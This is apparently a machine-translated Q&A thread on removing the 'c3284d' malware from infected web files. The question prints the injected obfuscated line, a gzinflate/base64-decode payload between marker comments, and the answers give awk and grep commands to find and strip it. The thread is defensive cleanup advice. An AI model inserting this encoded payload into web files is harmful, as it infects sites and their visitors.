2

我遇到了 Notorious c3284d 病毒的问题。它修改了几乎所有可以找到的 html/php/js 文件。

我已经更改了服务器上的所有密码和用户,所以如果它是一个被入侵的帐户,它应该已经解决了这个问题,但我仍然在努力完全删除它。

我能够使用一个简单的sudo grep -R "#c3284d#" /home命令找到所有受感染的文件。

但我需要一种快速的方法来搜索和替换它。

病毒签名是这一行:

“#c3284d#” 回波(gzinflate(BASE64_DECODE( “VVHBboMwDL1X6j / kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS + nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns / 48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B / ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2 + / EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS / 7parGmkfU + y1b5D / HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18 + XyLoNfNISRsBa1fG1UKwN + HIeK + Pqabw ==”))); “#/c3284d#”

当回波线可以改变和变化,但它总是以 开始#c32..#和结束#/c3....#

我只想用什么来代替它。

4

2 回答 2

1 
awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#\/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#\/c3284d#") == 0) { print $0 } }' dirty-file > clean-file

这是一口,但它的伎俩:

$ cat <<'EOF' | awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#\/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#\/c3284d#") == 0) { print $0 } }'
> foo
> #c3284d#
> bar
> baz
> #/c3284d#
> quux
> EOF
foo
quux
于 2012-07-15T09:24:14.017 回答
1

查找所有受影响文件的简单方法:

grep -H -r "c3284d" /home/user

此恶意软件代码来自受感染的客户端,该客户端具有以明文形式存储的 FTP 密码。该恶意软件能够抓取 FTP 登录信息,然后自动开始将广告代码注入文件。绝对应该是一个完整的审计——但如果你很幸运并且及时发现了它,它很可能不是来自服务器本身。

于 2012-09-10T12:48:04.600 回答